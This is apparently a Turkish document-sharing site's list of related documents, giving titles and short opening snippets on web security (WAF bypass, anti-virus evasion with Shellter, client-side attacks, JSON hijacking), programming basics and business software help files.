(W)eb (A)pplication (F)irewall Bypass http://www.bga.com.tr bilgi@bga.com.tr Hakkımda Mehmet Dursun İnce ( @mmetince ) Penetration Tester @BGA Vuln. Researcher @BGA mehmet.ince@bga.com.tr WAF Nedir? WAF
DetaylıAnti-Virüs Atlatma 3. Kurulum
Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır.
DetaylıBlackBerry Admin Service
SOFTWARE-TURK BlackBerry Admin Service BlackBerry Server Üzerinde Kullanıcı İşlemleri Arda Eralp 3/5/2009 www.software-turk.com BLACKBERRY SERVER ÜZERİNDE KULLANICI İŞLEMLERİ Blackeberry server üzerinde
Detaylıİstemci Tabanlı Saldırı Türleri. Ozan UÇAR ozan.ucar@bga.com.tr
İstemci Tabanlı Saldırı Türleri Ozan UÇAR ozan.ucar@bga.com.tr Kayseri 2012 Konuşmacı Hakkında Kıdemli Bilgi Güvenliği Danışmanı ve Eğitmen Bilgi Güvenliği AKADEMİSİ () PenetraPon Tester Blog Yazarı blog.bga.com.tr
DetaylıJAVASCRIPT JAVASCRIPT DİLİ
JAVASCRIPT JAVASCRIPT DİLİ Netscape Navigator 2.0 ile birlikte geliştirilen JavaScript dili istemci taraflı (client-side) script dilidir. Web sayfalarında dinamik içerik sağlamak ya da kullanıcıyla iletişim
DetaylıGEÇERLİLİK KONTROLLERİ VALİDATİON CONTROLS. Öğr. Gör. Emine TUNÇEL Kırklareli Üniversitesi Pınarhisar Meslek Yüksekokulu
GEÇERLİLİK KONTROLLERİ VALİDATİON CONTROLS Öğr. Gör. Emine TUNÇEL Kırklareli Üniversitesi Pınarhisar Meslek Yüksekokulu Giriş Kullanıcı bilgilerinin istenilen kriterlere uygun olup olmadığını denetlemek
DetaylıAKINSOFT ProKuaför. Yardım Dosyası. Doküman Versiyon : 1.01.01 Tarih : 29.12.2010. Sayfa-1. Copyright 2010 AKINSOFT
Yardım Dosyası Doküman Versiyon : 1.01.01 Tarih : 29.12.2010 Sayfa-1 1- ÇALIŞMA ŞEKLİ HAKKINDA KISA BİLGİ Müşterilerine daha iyi hizmet vermek ve kurumsallaşmak isteyen tüm kuaförlere hitap eden programı
DetaylıPHP kodları çoğu zaman HTML kodları arasına gömülü olarak yazıldığından öncesinde HTML kodlarınının bilinmesinde fayda vardır.
PHP Nedir? PHP, dünyada en çok kullanılan web programlama dillerinden biridir. Biraz daha teknik bir açıklama yapmak gerekirse şöyle söylenebilir. PHP, sunucu taraflı çalışan bir betik ve programlama dilidir.
Detaylıwww.elektrikogretmenleri.com
DREAMWEAVERDA NESNELERE DAVRANIŞ EKLEME Dreamweaver da fare hareket olaylı, animasyonlu görüntüler oluşturmak istenildiğinde hazır scriptler anlamına gelen Davranışlar(behaviors) kullanılmaktadır. Yukarıdaki
DetaylıWeb Uygulamaları Mimarileri ve Güvenliği
Web Uygulamaları Mimarileri ve Güvenliği METU CCLUB erbil Karaman başlıklar... Web uygulama mimarileri Uygulama geliştirme ve framework kullanımı Güvenli web uygulamaları için öneriler baslamadan önce...
DetaylıWeb Application Penetration Test Report
Web Application Penetration Test Report Sızma testleri (Pentest) ve zayıflık tarama (Vulnerability Assessment) birbirine benzeyen iki aşamadan oluşur. Zayıflık tarama hedef sistemdeki güvenlik açıklıklarının
DetaylıIMDS KURULUM KILAVUZU (AIOS TEDARİKÇİLERİ İÇİN HAZIRLANMIŞTIR)
IMDS KURULUM KILAVUZU (AIOS TEDARİKÇİLERİ İÇİN HAZIRLANMIŞTIR) Internet tarayıcınızın adres kutucuğuna; http://www.mdsystem.com/ yazdıktan sonra, klavyenizden «ENTER» düğmesine basınız. Yukarıdaki, kırmızı
DetaylıİEÜ : WEBMAIL : FILTERS
İEÜ : WEBMAIL : FILTERS İEÜ WebMAIL Filters Modülü Nedir? İzmir Ekonomi Üniversitesi Bilgi İşlem Müdürlüğü tarafından sağlanan WebMAIL hizmeti Filters modülü ile aşağıdaki işlemleri kolayca yerine getirebilirsiniz;
DetaylıModule 2 Managing User And Computer accounts
16 Creating Users Accounts With Command ( Komutla Kullanıcı Hesabı Oluşturma ) Organization Unit i komutla oluşturmak istersek aşağıda bulunan şekildeki yönergeleri takip ediyoruz. Module 2 Managing User
DetaylıUpgrading Internet Technology skills of Information and Communication Technologies (ICT) Professionals
The European Union s Making the Labour Market more Inclusive III programme For North Cyprus Upgrading Internet Technology skills of Information and Communication Technologies (ICT) Professionals Module
DetaylıJSON Korsanlığı. Mesut Timur, Şubat 2010, WGT E-Dergi 4. Sayı
JSON Korsanlığı Mesut Timur, Şubat 2010, WGT E-Dergi 4. Sayı İnternetin gün geçtikçe hayatımızdaki önemi arttı ve web siteleri milyonlarca insan tarafından girilen yerler haline geldi. Artık çevremizden
DetaylıBolum 9. Konu Başlıkları
Bolum 9 Konu Başlıkları 1.Grafik Arayüz Tasarımı//Pencere Araçları(Widgets) Label Button Enrty Checkbutton Toplevel Listbox Menu Text Bitmap Herhangi bir pencere üzerinde bulunan düğmeler,etiketler,sağa-sola,yukarı-aşağı
DetaylıGENEL BİLGİLER KİTAP SÜRESİNİ UZATMA
GENEL BİLGİLER Katalog tarama ekranından Özel Oturum açarak (üye kodu ve şifreli giriş yaparak) şahsi bilgilerim, üzerimdekiler, iadelerim, arşivim, ayırttıklarım, listem, ilgi alanlarım, eser istek, KAÖ
Detaylı1. Kartınızın türüne göre aşağıdaki bağlantılardan ilgili olana tıklayın.
1. Kartınızın türüne göre aşağıdaki bağlantılardan ilgili olana tıklayın. TEB Platinum MasterCard Vanity URL www.hertz.com/goldenrol/pm/teb/tr Açılan sayfada Join Now butonuna tıklayın. 2. Personal and
DetaylıVirtualaze Unify Kurulumu
Kurulum öncesi dikkat edilecek hususlar Virtualaze Unify Kurulumu 1. Kurulumu yapmadan önce Windows güncelleştirmelerinin hepsini tamamlayınız. 2. İşletim sistemi domain de ise,domainden çıkarıp work gruba
DetaylıASP.Net validation controls validate the user input data to ensure that useless, unauthenticated or
PART 11 ASP.NET Validation Controls ASP.Net validation controls validate the user input data to ensure that useless, unauthenticated or contradictory data don t get stored. ASP.Net provides the following
DetaylıPHP 1. Hafta 2.Sunum
PHP 1. Hafta 2.Sunum Hello World Bu derste görülecekler WAMP ve PHP Hosting kavramı ve bizi neden ilgilendirmediği Domain ve localhost kavramları www klasörü İlk PHP kodunun
DetaylıEvren Yazılım Donanım Mühendislik Bilgisayar İthalat İhracat Turizm Tic. San. Ltd. Şti. Saray Mah. Huriler Sok. Demirağa Apt. No:23/B Alanya/Antalya
Evren Yazılım Donanım Mühendislik Bilgisayar İthalat İhracat Turizm Tic. San. Ltd. Şti. Saray Mah. Huriler Sok. Demirağa Apt. No:23/B Alanya/Antalya * RestPro ve RestPro logosu Evren Yazılım Ltd. Şti nin
DetaylıAKINSOFT Franchise Server 2 Yardım Dokümanı
AKINSOFT Franchise Server 2 Yardım Dokümanı Doküman Versiyon: 01.02.02 Tarih: 03.03.2015 1 1. ÇALIŞMA SİSTEMİ HAKKINDA BİLGİ Franchise Server 2 programı; Franchising veren veya bağımsız birimlerinin satış
Detaylıdinamo / Periyodik İşler
1 Periyodik İşler dinamo / Periyodik İşler 2 Periyodik İşler Genel Tanım Periyodik İşler Nedir? Periyodik işler, kullanıcılar tarafından belirlenmiş olan rapor ve makroları yine kullanıcılar tarafından
DetaylıIceWarp kurulumu. IceWarp Server kurmanız için yapmamız gereken adımlar şunlardır:
IceWarp kurulumu IceWarp Server kurmanız için yapmamız gereken adımlar şunlardır: http://www. icewarp. com sitesinden,on line satış temsilicilerden ve ya da on line installer (online kurucusundan) istediğiniz
Detaylı